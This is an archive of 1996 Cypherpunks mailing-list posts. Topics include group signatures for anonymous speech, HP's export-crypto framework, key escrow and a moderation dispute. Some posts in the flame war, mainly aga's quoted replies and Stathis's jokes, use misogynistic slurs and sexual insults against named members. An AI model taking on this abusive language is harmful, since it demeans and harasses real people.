From: Clint Barnett <cbarnett@eciad.bc.ca>
Date: Sun, 17 Nov 1996 17:58:57 -0800 (PST)
To: Murray Hayes <mhayes@infomatch.com>
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <199611120841.AAA16334@infomatch.com>
Message-ID: <Pine.SGI.3.91.961117175306.2712G-100000@oswald>
MIME-Version: 1.0
Content-Type: text/plain



or possibly a tube of epoxy to keep the cards together permanently, a few 
armed friends/sycophants to keep watch on the house of cards, perhaps a 
few mentally unbalanced people to kidnap or assasinate Person B's friends 
and family, some Marketing and PR men to drum up public support for the 
existance of the house of cards and make people think that it's good and 
deserves to be there, and on and on and on...

couldn't we all just get along?

clint barnett
lord of the cosmos
emily carr institute

On Tue, 12 Nov 1996, Murray Hayes wrote:

> On Fri, 08 Nov 1996 14:46:56 +0100, Matts Kallioniemi wrote:
> 
> >At 17:12 1996-11-07 -0800, jim bell wrote:
> >>Simple analogy:  Suppose you put two people into a room with a deck of 
> >>playing cards and a table, instructing "Person A" to build a house-of-cards, 
> >>and telling "Person B" to stop him from achieving his goal.  Who do you 
> >>think will win?  Obviously, the latter will win:  It's vastly easier to 
> >>knock such a structure down than to build it in the first place,  and all 
> >>"Person B" has to do is occasionally take a whack at the structure. 
> >
> >What if Person A is better armed? Could that change the outcome?
> >
> >
> >
> 
> What if person A has a pack of chewing gum?
> 
> 
> mhayes@infomatch.com
> 
> It's better for us if you don't understand
> It's better for me if you don't understand
>                                              -Tragically Hip
> 
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Sun, 17 Nov 1996 18:51:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: HP's crypto technology
Message-ID: <199611180213.SAA04599@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


I was poking about on the hp web server, trying to get some more hints
about the technology they are pushing:

<URL: http://www-dmo.external.hp.com/gsy/press/sevcik.html>

> Date: 7/11/96
> 
> Rich Sevcik, vice president and general manager of the Systems
> Technology Group, testified to a U.S. Senate subcommittee June 12 on
> the importance of cryptography to Hewlett-Packard's ability to compete
> in the international marketplace and to the nation's high-technology
> competitiveness.
>
> [...]
> 
> In conclusion, he introduced HP's technology called the International
> Cryptography Framework (ICF). Products based on ICF would contain a
> suite of cryptography capabilities of various strengths and types,
> all non-functional. A customer then could enable the desired types and
> strengths of cryptography in conformance with export and host government
> regulations by obtaining a stamp-size smart card (known as a "policy
> card"), programmed to turn on the particular cryptography capability
> allowed. This would protect the right of each nation to establish an
> independent policy governing cryptography in digital communication and
> storage. Sevcik showed the subcommittee members a prototype cryptography
> unit and several policy cards. He said HP plans to have an initial
> ICF product available later this year as part of a total smart card
> system solution offered due to an alliance with Informix and GEMPLUS,
> with other ICF-based products planned for next year.
> 
> U.S. export license authorities are finishing their review of this
> first-phase implementation of ICF. "We have been extremely pleased with
> the responsiveness and cooperation of these agencies in the review of
> our technology," Sevcik said. "We have every reason to believe that
> the cryptographic unit and host systems will be granted liberal export
> authorization consistent with our expectations for ICF."


<URL: http://www.hp.com/csopress/95sep26.html>

> Press Release
> 
> HP Announces Alliance with Gemplus and Informix to Deliver Personal
> Information Cards for Consumers
> 
> U.S. Government Reviewing Industry-backed HP International Cryptography
> Framework
> 
> September 26, 1995
> 
> PALO ALTO, Calif., Sept. 26, 1995 -- Hewlett-Packard Company, Gemplus
> and Informix today announced the formation of an alliance to develop a
> secure infrastructure that will enable corporations to speed new services
> to consumers via a credit-card-sized personal information card.
> 
> These cards will carry several thousand times the amount of data carried
> by currently available smart cards. Additionally, the data on these cards
> will be fully encrypted for secure international communication, so the
> card will be able to be used anywhere in the world. HP believes that
> the U.S. government will authorize the export to commercial enterprises
> of products in Phase I(1) of HP's international cryptography framework
> standard -- one of the underlying technologies in the infrastructure
> that will enable the international use of personal information cards. The
> framework is based on HP's open cryptographic structure.
> 
> [...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Sun, 17 Nov 1996 18:32:33 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Members of Parliament Problem
Message-ID: <v02140b00aeb57052428c@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:23 PM 11/17/1996, Timothy C. May wrote:
>At 11:43 AM -0800 11/17/96, Peter Hendrickson wrote:
> For the specific example Peter cites, of a member of Parliament who doesn't
> like the possibility of anonymity....well, he wouldn't be part of the
> DC-Net would he? Generally, there are no cryptographic solutions that will
> encompass the case where some member wants to speak anonymously, but no one
> else does. If a message originates from "someone in Parliament," but only
> one member of Parliament is set up to speak anonymously, then of course by
> simple elimination he is the speaker. As before, this is beyond any
> cryptographic solution.

It turns out - amazingly enough - that this is not true!

Hal Finney mentioned on Friday a paper by Chaum and Heyst entitled
"Group Signatures."  It was presented at EuroCrypt '91.

I scanned this paper today and it has four schemes, the last of which
requires no participation of a trusted party or the other people
one wishes to hide amongst.  So long as everybody has published their
public key, the rogue Member of Parliament can sign messages without
revealing his identity, yet demonstrating that he is in fact a
Member of Parliament.  (Thanks Hal!)

It uses a zero-knowledge proof.  Hal said earlier that it was not
clear to him that this could be turned into a non-interactive proof.
It isn't clear to me, either.  Whatever the case, I consider
the problem solved.

It would be nice if it were non-interactive, but the rogue MP need only
demonstrate his identity to ten or so publicly trusted parties to have
enough basis to make statements that the world will consider to be credible.

> There may be easier to implement approaches, such as the ones people have
> proposed involving distribution of "voting tokens" (blinded, for anonymity).

> Anonymous voting is, in fact, formally equivalent (with some hand-waving
> about some details) to the problem of untraceable speaking. The example
> Peter cited, of a MP wanting to "speak anonymously" is equivalent to
> wanting his vote--on Northern Ireland, for example--to be anonymous.

I would say that it is slightly different in that anonymous voting
requires that you guarantee that each voter votes only once.  Clearly
these are similar problems.

Tangentially, I would really enjoy the privilege of verifiable anonymous
voting using my computer.  As it is now, I have no way of telling
whether my vote counts or not.  The entire process is handled by
people I don't know and have no particular reason to trust.

> A simple form of this is "blackballing." Members have white and black
> balls, and place one of the balls in an urn. Properly implemented, this
> gives anonymity.

I always wondered where that term came from.  Chaum and Heyst's protocol
above could be used for blackballing in cases where only one black ball
can make the decision.  For instance, some clubs have a rule that any
current member can "blackball" prospective members.  (Sounds harsh?
Not as harsh as learning that a *majority* of the club didn't like you!)

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 17 Nov 1996 14:51:35 -0800 (PST)
To: ses@tipper.oit.unc.edu
Subject: Re: Members of Parliament Problem
In-Reply-To: <Pine.SUN.3.91.961117133019.11544A-100000@tipper.oit.unc.edu>
Message-ID: <199611171837.SAA00457@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero <ses@tipper.oit.unc.edu> writes:
> On Fri, 15 Nov 1996, Rich Graves wrote:
> 
> > Peter Hendrickson wrote:
> > > 
> > > 
> > > There are times when one wishes to speak anonymously, yet speak
> > > as a member of a group.
> > 
> > You either need to trust a shared server to know and then blind your 
> > identity, or trust the people with whom you share a secret key not to 
> > give that key to non-group members.
> 
> Why not use  blinding for obtaining the certificate? 
> 
> Create a number up public/private key pairs, blind them, then do the
> cut-and-choose thing with the security officer. He signs the blinded key,
> then returns it. Unblind the remaining pubic key, and you've got a public
> key with the appropriate signature on it. 

Reasonable, except that it's linkable.  You may not want it to be
linkable, because the more messages signed with the key, the greater
the chance that speech paterns give away the speaker.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sun, 17 Nov 1996 18:44:29 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: HP announcing some International Cryptography stuff on Monday
In-Reply-To: <199611180018.QAA10957@netcom6.netcom.com>
Message-ID: <Pine.3.89.9611171813.A12245-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, Bill Frantz wrote:

> At 12:49 PM 11/15/96 -0800, Timothy C. May wrote:
> >It sounds ominous to me. Another backroom deal, probably for some form of
> >key recovery strategy, aka GAK.
> 
> I'd bet GAK too.  RSADSI has been working on GAK protocols, so these ones
> might actually work.  I feel as pessimistic about this one as Lucky usually
> is.

I have a hard time believing that Netscape caved. As I wrote in July, HP 
was working on selling our children's birthright to obtain an export 
license for their product. But Netscape participating in this just 
doesn't sound right.

> Since I am inherently optimistic, one ray of light may be that the San Jose
> Mercury News was mentioning the ability to export the system, and then when
> the necessary licenses (US and foreign) were obtained, turn on the
> encryption.  I guess from this that the encryption is in hardware.  Now,
> software/hardware interfaces are usually fairly simple, so what we have
> here is a software system with a crypto hook.

One possibility is that all crypto is done in hardware. The recent 
announcements by many hardware manufacturers that smartcard readers will 
be included in all their products (MS will put them into their keyboards) 
might get the necessary infrastructure deployed.

Of course, no crypto will work without the hardware token. The 
applications use signed code. Hardware tokens are only valid for a 
certain time. Making future mandatory upgrades to Fortezza, etc. a cinch.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Sun, 17 Nov 1996 18:45:55 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Members of Parliament Problem
Message-ID: <v02140b03aeb57df576d3@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:32 PM 11/17/1996, Peter Hendrickson wrote:
>At 1:23 PM 11/17/1996, Timothy C. May wrote:
>>At 11:43 AM -0800 11/17/96, Peter Hendrickson wrote:
>> For the specific example Peter cites, of a member of Parliament who doesn't
>> like the possibility of anonymity....well, he wouldn't be part of the
>> DC-Net would he? Generally, there are no cryptographic solutions that will
>> encompass the case where some member wants to speak anonymously, but no one
>> else does. If a message originates from "someone in Parliament," but only
>> one member of Parliament is set up to speak anonymously, then of course by
>> simple elimination he is the speaker. As before, this is beyond any
>> cryptographic solution.

> It turns out - amazingly enough - that this is not true!

It turns out - not so amazingly - that Tim is right!

See Hal Finney's post of about this time.  It turns out that the
other Members of Parliament do have to cooperate.

Sorry about that.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tom Van de Wiele" <tomvdw@glo.be>
Date: Sun, 17 Nov 1996 09:55:30 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Please take me off the list
Message-ID: <199611171755.SAA25951@phobos.glo.be>
MIME-Version: 1.0
Content-Type: text/plain


Sir

Please take me off the list.

Thanks

Tom Van de Wiele  -- tomvdw@glo.be




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 17 Nov 1996 16:40:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Unsubscriving Briefly
In-Reply-To: <199611171754.JAA21558@netcom17.netcom.com>
Message-ID: <Z8akXD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


mpd@netcom.com (Mike Duvos) writes:

> I'm unsubscriving from the list for a few days (weeks?) until the
> noise level drops down a bit.  I'll check it periodically on the Web
> and I'm pretty sure that if something happens that shakes the world
> of cryptography to its very foundations, someone will probably send
> me some email about it.
>
> Please continue to party while I am away.

I'm not saying good riddance because Mike was one of the few remaining
people on this mailing lists who actually had brains. Too bad.

Of course, it's all John Gilmore's and Timmy May's fault.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Sun, 17 Nov 1996 09:14:40 -0800 (PST)
To: sandfort@crl.com>
Subject: Re: AGA'S LIMITED VOCABULARY
Message-ID: <199611172113.TAA23081@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 11:37 ðì 17/11/1996 -0500, aga wrote:
>> about the use of technology to protect privacy.  Perhaps you 
>> were confusing it with that other list you are on:
>> alt.sex.yourmother.
>
>No, it is your mother I have been fucking.

Pity! Aga should respong to this lady's needs FIRST! :-)

BTW, (paraphrasing Speedy Gonzales)...

I think she really fucks for money, but since you are an aga
she'll fuck you for nothing! :-)







>> > What year did you graduate from Law School?
>> 
>> Irrelevant, but it was 1975.  More importantly, though, when did
>> YOU graduate from law school?
>
>1975.  And my school was better than your school.
>
>I was the fucking class President in Law School.  We
>fucked on Library tables at Pitt.  Where the fuck did
>you go to school?



I can see the beginnings of an... S/M cyber-romance in these lines.
ROTFL!!!

Aga should not forget to carry a... cane in his briefcase.

The more arrogant they sound at first, the more submissive their
fantasies are!  (ALL masochists in fact).  :-)


Love and Jelly Babies
George

P.S.  My first guess is that Sandy is a Piscean, and Aga is a Taurus.
      It would work out better with him being a Scorpio or a Leo, however.
      (My second guesses on Aga). My second guess on Sandy is that she's
      a Virgo, however. In this case avoid her at all costs! ROTFL!!!!















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 17 Nov 1996 19:13:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Members of Parliament Problem
In-Reply-To: <v02140b00aeb57052428c@[192.0.2.1]>
Message-ID: <v03007800aeb58385887b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:32 PM -0800 11/17/96, Peter Hendrickson wrote:
>At 1:23 PM 11/17/1996, Timothy C. May wrote:
>>At 11:43 AM -0800 11/17/96, Peter Hendrickson wrote:
>> For the specific example Peter cites, of a member of Parliament who doesn't
>> like the possibility of anonymity....well, he wouldn't be part of the
>> DC-Net would he? Generally, there are no cryptographic solutions that will
>> encompass the case where some member wants to speak anonymously, but no one
>> else does. If a message originates from "someone in Parliament," but only
>> one member of Parliament is set up to speak anonymously, then of course by
>> simple elimination he is the speaker. As before, this is beyond any
>> cryptographic solution.
>
>It turns out - amazingly enough - that this is not true!
>
>Hal Finney mentioned on Friday a paper by Chaum and Heyst entitled
>"Group Signatures."  It was presented at EuroCrypt '91.
>
>I scanned this paper today and it has four schemes, the last of which
>requires no participation of a trusted party or the other people
>one wishes to hide amongst.  So long as everybody has published their
>public key, the rogue Member of Parliament can sign messages without
>revealing his identity, yet demonstrating that he is in fact a
>Member of Parliament.  (Thanks Hal!)

OK, so let's make my example concrete. Ten people form a group such as we
have been discussing. A message emanates from the group at some time. Nine
of the members are actually FBI agents. They know they didn't issue the
message. (I mentioned the meta-issue of their lying, so no smart aleck
comments about the FBI planting the message!). Q.E.D., any message must've
come from the 10th member. All the zero knownledge and DC-Net software in
the world can't change this basic existential truth.

This was my point that "this is beyond any cryptographic solution."

Please explain, Peter, how your example of signing messages but not
revealing identity precludes this meta-cryptography means of revealing
identities?

So far as know, in _any_ N-party cryptographic game, if N - 1 are acting as
one (colluding, sharing), this reduces to a 2-party game. And the second
party can always know if he was the source of a message or not. If he was
not, the message must have come from the other party.

(If I am wrong on this, I'll be shocked, and pleasantly surprised that
crypto has revealed something amazing. I rather doubt I will.)

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 17 Nov 1996 19:14:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Members of Parliament Problem
In-Reply-To: <v02140b03aeb57df576d3@[192.0.2.1]>
Message-ID: <v03007801aeb586031e72@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:45 PM -0800 11/17/96, Peter Hendrickson wrote:
>At 6:32 PM 11/17/1996, Peter Hendrickson wrote:
>>At 1:23 PM 11/17/1996, Timothy C. May wrote:
>>>At 11:43 AM -0800 11/17/96, Peter Hendrickson wrote:
>>> For the specific example Peter cites, of a member of Parliament who doesn't
>>> like the possibility of anonymity....well, he wouldn't be part of the
>>> DC-Net would he? Generally, there are no cryptographic solutions that will
>>> encompass the case where some member wants to speak anonymously, but no one
>>> else does. If a message originates from "someone in Parliament," but only
>>> one member of Parliament is set up to speak anonymously, then of course by
>>> simple elimination he is the speaker. As before, this is beyond any
>>> cryptographic solution.
>
>> It turns out - amazingly enough - that this is not true!
>
>It turns out - not so amazingly - that Tim is right!
>
>See Hal Finney's post of about this time.  It turns out that the
>other Members of Parliament do have to cooperate.
>
>Sorry about that.

My response to your first message just was being sent as I was receiving
this one.

Glad to know my intuitions were sound.

--Tim



"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: twilley@juno.com (David Weintraub)
Date: Sun, 17 Nov 1996 16:34:55 -0800 (PST)
To: Cypherpunks@toad.com
Subject: Off the subjects.
Message-ID: <19961117.193051.3502.1.Twilley@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

     I am anxious to find an E-mail list forum dealing
with financial matters.  Possibly, there exists a forum to find a forum.

     Here in New Jersey there are rumors running about; that 401K's, and
other corporation contribution plans are corporate assets: both their
contribution, and the monies deducted from your
pay, as well as, any other contributions you may
have made.

     In the event of reorganization, in any form, including bankruptcy,
these monies are available for 
redistribution to creditors.  Meaning, not us.

     If true, it's a bit frightening; all and all.

			Thanks,
			Twilley.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Weisman <sweisman@cc.huji.ac.il>
Date: Sun, 17 Nov 1996 09:41:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Strong Encryption for International Versions of Netscape
Message-ID: <3.0.32.19961117193927.006bc720@cc.huji.ac.il>
MIME-Version: 1.0
Content-Type: text/plain


FOR IMMEDIATE RELEASE: November 17, 1996

ANNOUNCING STRONG ENCRYPTION FOR INTERNATIONAL VERSIONS OF NETSCAPE

JERUSALEM, Israel -- SecureScape Technologies announces the alpha release
of its first product, SecureScape.  This revolutionary program offers
international users of Netscape Navigator the same strong encryption as
that enjoyed by users in North America.

All software encryption products developed in the United States are subject
to export restrictions.  Such exported software is subject to an arbitrary
40-bit key length, compared to the 128-bit (or greater) key length commonly
found in domestic software.  This weakened software is in certain ways
inferior to no encryption at all, since it gives users a false sense of
security.

The Executive Order by President Clinton on November 15, which modifies
U.S. Government policy on export restrictions, still requires requests for
export permits to be considered on a case by case basis.

Furthermore, it is very likely that strong encryption products will be
granted export permits conditional on key-escrow or other compromise
arrangements, because the Executive Order states, "the export of encryption
software . . .  must be controlled . . . such software shall not be
considered or treated as 'technology'."  Implying that encryption software
is still considered a form of munitions.

The irony, of course, is that strong encryption has been widely and easily
available outside of the U.S. for years.  SecureScape was developed using
the freely available SSLeay library, developed by Eric Young of Australia.

SecureScape Technologies was founded by Scott Weisman, a software developer
residing in Jerusalem, to develop and market Internet security products.
The company is seeking investors interested in a strategic partnership.

The SecureScape home page is located at
<http://www.SecureScape.com/secscape/>.  SecureScape currently works with
Netscape versions 1.1 or later on the Windows 95 and Windows NT platforms.

CONTACT:
Scott Weisman
P.O.B. 31194
Jerusalem 91311 ISRAEL
sweisman@SecureScape.com

(c) 1996 Scott Weisman - All Rights Reserved.
Netscape and Netscape Navigator are trademarks of Netscape Communications
Corporation.
Microsoft, Windows, and Windows NT are trademarks of Microsoft Corporation.
SecureScape uses software developed by Eric Young (eay@mincom.oz.au).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 17 Nov 1996 19:42:56 -0800 (PST)
To: Brian Davis <cypherpunks@toad.com
Subject: Filters and Freeh
In-Reply-To: <Pine.LNX.3.95.961117073649.25183D-100000@dhp.com>
Message-ID: <v03007802aeb587b383d2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:55 PM -0500 11/17/96, Brian Davis wrote:

>Regardless of what good he may have done in the past, Vulis was (and is)
>engaged in an enormously egotistical disply of bad manners and off-topic
>posting.  Having just installed Eudora Pro 3.0, I know that I can easily
>filter him out, but have hesitated to use filters in the past.  Vulis may
>be the one to push me over the edge.

I've been using Eudora for several years, and Pro since it came out. I
heavily use filters to sort the various mailing lists into their own
folders, so it's natural enough to filter a few names into "Twit" or
"Trash" folders. I do sometimes look over what's in these folders before
emptying them; the status of the messages helps to remind me not to respond
to them, even if I happen to look at them. With Vulis and aga spewing so
much bile, I'm increasingly tempted to empty the trash before even
beginning to read my messages, to remove any temptation to monitor what
they're saying.

I think Gilmore made a tactical error, with predictable effects. But I've
also tried to stay out of either the piling-on or the defense of John.

>primarily because a lot of people are listmembers.  This confiscation of
>private property would, I thought, be inimical to the cypherpunks general
>philosophy (to the extent one exists).  I'm sure Louis Freeh will be
>pleased to know that you believe in such confiscation.  With email

I know you mean this as a jibe (invoking the name of the Great Enemy as the
ally of one's enemy). Even opponents of GAK and Freeh in general don't hold
that Freeh supports confiscation of private property (except in RICO cases,
drug case forfeitures, or when illegal religions are practicing in Waco, or
when...well, maybe he _does_, now that I think about it! :-))


>Just because you don't get your way, doesn't mean that what happened was
>illegal or even wrong.  Your authoritarian views would do Stalin proud.
>

Good sentiments for an ex-prosecutor!

(Again, I should clarify. I doubt many prosecutors are
authoritarian-minded, politically. I even doubt many of them would support
GAK and mandatory key escrow...wait until their own communications are
GAKked, wait until they realize that attorney-client electronic
transmissions are GAKked, with no certainty that  the other side has not
used various national security or whatever justifications for peeking....I
think even the prosecutors of the country will feel some strong civil
libertarian twinges.)

While I don't believe many people in government are "evil" or have "bad
intentions," I'm a strong believer that _systemic_ or _institutional_ evil
is possible. Thus, the wide opposition to mandatory key escrow, just as
civil libertarians of all stripes would oppose mandatory tatooing of
national I.D. barcodes on arms, or the mandatory retro-fitting of all homes
with special curtains containing a police-accessible "transparency mode."

Domestic rules about crypto--when they come, perhaps as early as in the
next several years, depending on external events and on the political
climate--will trigger huge constitutional challenges. Much bigger than the
Bernstein and Junger cases. Maybe bigger than the CDA case.

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 17 Nov 1996 16:56:31 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: Fuck You Dumb Cunt
In-Reply-To: <Pine.LNX.3.95.961117073649.25183D-100000@dhp.com>
Message-ID: <Pine.BSF.3.91.961117194008.12616I-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, aga wrote:

> On Sat, 16 Nov 1996, Sandy Sandfort wrote:
> 
> > Date: Sat, 16 Nov 1996 08:37:14 -0800 (PST)
> > From: Sandy Sandfort <sandfort@crl.com>
> > To: aga <aga@dhp.com>
> > Cc: Cypherpunks <cypherpunks@toad.com>
> > Subject: Re: Does John Gilmore...
> > 
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >                           SANDY SANDFORT
> >  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> > 
> > C'punks,
> > 
> > On Sat, 16 Nov 1996, aga wrote:
> > 
> > > The cyberpunks mailing list is PUBLIC property and should NOT
> > > be controlled by John Gilmore!  This just goes to show the real
> > > facist censorship motives that the EFF has behind it.
> > 
> > I have a suggestion for "Aga" and others who believe this sort of
> > nonsense.  Please do us all a favor and try to sue John.  I'm sure 
> > that among all jack-leg and wannabe lawyers on this list that they
> > can come up with a viable cause of action.  And John has deep 
> > pockets; you could (literally) make out like bandits AND rescue 
> > "freedom of speech" on privately maintained mailing lists.  You 
> > could be heroes (or look ten times as foolish as you already do).
> > 
> > 
> >  S a n d y
> > 
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > 
> 
> fuck you dumb cunt.  I told you to leave that list off of your
> fucking headers -- you just do not listen, do you?

So this great defender of free speech seeks to silence it?  Why not just 
let listmembers use filters?  Those who disapprove of John 
Gilmore's action argue that he should have done that, although you seem 
to believe that the argument doesn't apply when someone fouls your nest. 
John's action wasjustified in my view, although I believe courtesy 
should have caused him to notify Vulis that he was out ... and for all 
the heat he has taken, John should've prevented him from posting to the list.

Regardless of what good he may have done in the past, Vulis was (and is) 
engaged in an enormously egotistical disply of bad manners and off-topic 
posting.  Having just installed Eudora Pro 3.0, I know that I can easily 
filter him out, but have hesitated to use filters in the past.  Vulis may 
be the one to push me over the edge.

I'm especially sorry that some of you don't believe in property rights.  
Some have argued that the list is now a public forum -- apparently 
primarily because a lot of people are listmembers.  This confiscation of 
private property would, I thought, be inimical to the cypherpunks general 
philosophy (to the extent one exists).  I'm sure Louis Freeh will be 
pleased to know that you believe in such confiscation.  With email 
being used by so many people and because it traverses some publicly owned 
sites, you certainly cannot argue that it is not a public forum -- if 
cypherpunks is.  So GAK should be OK, because it is simply an attempt to 
broaden the audience for speech, right?  And, in any event, the 
government could choose to ignore property rights and confiscate the 
speech, as you seek to do with John's privately owned list.

Just because you don't get your way, doesn't mean that what happened was 
illegal or even wrong.  Your authoritarian views would do Stalin proud.

EBD
 
> Anybody that supports John Gilmore is an asshole bitch or cocksucker
> one of the two.

Beautiful use of language.

> 
> out.
> 
> -a
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 17 Nov 1996 17:04:36 -0800 (PST)
To: Huge Cajones Remailer <nobody@huge.cajones.com>
Subject: Re: The Utility of Privacy
In-Reply-To: <199611171612.IAA01572@mailmasher.com>
Message-ID: <Pine.SUN.3.94.961117195852.13668A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, Huge Cajones Remailer wrote:

> Date: Sun, 17 Nov 1996 08:12:12 -0800
> From: Huge Cajones Remailer <nobody@huge.cajones.com>
> To: cypherpunks@toad.com
> Subject: Re: The Utility of Privacy
> 
> 
> At 4:11 AM 11/17/1996, Black Unicorn wrote:
> >On Sat, 16 Nov 1996, Huge Cajones Remailer wrote:
> >
> >> Date: Sat, 16 Nov 1996 18:22:33 -0800
> >> From: Huge Cajones Remailer <nobody@huge.cajones.com>
> >> To: cypherpunks@toad.com
> >> Subject: The Utility of Privacy
> >> 
> >> 
> >> Privacy is a hassle.  Is it worth it?
> >> 
> >> Which unfortunate situations does privacy prevent?  What are the odds
> >> that they will occur?  How much effort will it take to prevent these
> >> outcomes?  As a model, use the present and future situation of a
> >> typical reader of this list.
> >
> >Insurance is a hassle.  Is it worth it?
> >
> >Which unfortunate situations does insurance prevent?  What are the odds
> >that they will occur?  How much effort will it take to prevent these
> >outcomes?  As a model, use the present and future situation of a
> >typical reader of this list.
> 
> I know many people who were happy they had insurance due to car
> accidents, health problems, or whatever.  What is more, the odds of
> these events are carefully calculated and available.  Call an actuary.
> 
> Are there similar sources of information calculating privacy risk?  I
> don't think so.

Ah, so let's ignore the risks, on the grounds that we have no idea what
they might be, or their magnitude.  That's clever.  I like that.

> Informally, I don't know anybody who has suffered due to a loss of
> privacy.

Your circle of associations must be limited.
 
> It may be the case that it is politically beneficial to have a society
> of privacy fanatics.  But, this is different from the direct benefit
> to each participant.

Agreed, but since you do not quantify the magnitude of either of these,
even in terms of speculation, I'm not sure what your point is.

> My question remains unanswered, probably because privacy isn't worth
> the effort.

And no one can answer that question but you.  Privacy is a personal
decision.  I'm sure there are many out there who will suffer no harm even
if their SSN is published in the Wall Street Journal.

Why, however, fail to take out insurance when the cost is so low?  Really
it doesn't take much in the way of effort or money to assure one's
privacy.  (Hint: It's getting cheaper every day in some ways).

Answer: Nearly all of the cost of privacy is concentrated in set up cost.
Maintaince costs are minimal once set up has been made.  Yet getting over
that first hurdle is the biggest leap.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





